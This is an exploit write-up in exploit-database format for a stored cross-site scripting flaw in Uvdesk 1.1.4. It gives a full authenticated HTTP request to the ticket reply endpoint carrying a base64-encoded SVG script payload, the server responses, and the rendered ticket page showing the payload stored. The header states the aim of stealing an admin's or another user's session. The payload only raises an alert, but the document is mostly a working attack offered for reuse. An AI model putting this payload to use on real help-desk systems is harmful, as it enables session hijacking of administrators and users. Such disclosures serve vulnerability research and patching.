# Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)
# Date: 14/08/2023
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://www.uvdesk.com/
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 1.1.4
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.
## Example XSS Stored in new ticket
-----------------------------------------------------------------------------------------------------------------------
Param: reply
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 812
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3
Connection: close
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
Content-Disposition: form-data; name="threadType"
forward
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
Content-Disposition: form-data; name="status"
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
Content-Disposition: form-data; name="subject"
aaaa
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
Content-Disposition: form-data; name="to[]"
test@local.host
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
Content-Disposition: form-data; name="reply"
%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
Content-Disposition: form-data; name="pic"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
Content-Disposition: form-data; name="nextView"
stay
------WebKitFormBoundaryXCjJcGbgZxZWLsSk--
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Mon, 14 Aug 2023 11:33:26 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Cache-Control: max-age=0, must-revalidate, private
Location: /uvdesk/public/en/member/ticket/view/1
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS
Access-Control-Allow-Headers: Access-Control-Allow-Origin
Access-Control-Allow-Headers: Authorization
Access-Control-Allow-Headers: Content-Type
X-Debug-Token: bf1b73
X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73
X-Robots-Tag: noindex
Expires: Mon, 14 Aug 2023 11:33:26 GMT
Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 398
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />
<title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>
</head>
<body>
Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.
</body>
</html>
-----------------------------------------------------------------------------------------------------------------------
Redirect and view response:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2023 11:44:14 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Cache-Control: max-age=0, must-revalidate, private
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS
Access-Control-Allow-Headers: Access-Control-Allow-Origin
Access-Control-Allow-Headers: Authorization
Access-Control-Allow-Headers: Content-Type
X-Debug-Token: 254ce8
X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8
X-Robots-Tag: noindex
Expires: Mon, 14 Aug 2023 11:44:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 300607
<!DOCTYPE html>
<html>
<head>
<title>#1 vvvvvvvvvvvvvvvvvvvvv</title>
[...]
<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>
[...]
-----------------------------------------------------------------------------------------------------------------------
XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.